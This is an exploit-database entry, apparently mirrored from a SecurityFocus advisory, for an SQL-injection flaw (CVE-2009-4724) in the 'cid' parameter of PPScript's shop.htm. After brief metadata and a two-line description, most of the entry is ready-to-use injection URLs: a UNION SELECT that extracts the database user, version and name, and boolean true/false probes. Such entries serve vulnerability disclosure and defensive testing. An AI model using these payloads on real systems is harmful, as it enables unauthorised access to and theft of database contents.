Payment Processor Script (PPScript) - 'shop.htm' SQL Injection

Author: MizoZ
type: webapps
platform: php
port: 
date_added: 2009-08-03  
date_updated: 2016-10-27  
verified: 1  
codes: CVE-2009-4724;OSVDB-56728  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 34493.txt  
source: https://www.securityfocus.com/bid/42539/info

PPScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.


http://www.example.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())
http://www.example.com/shop.htm?cid=31+and+1=1
http://www.example.com/shop.htm?cid=31+and+1=100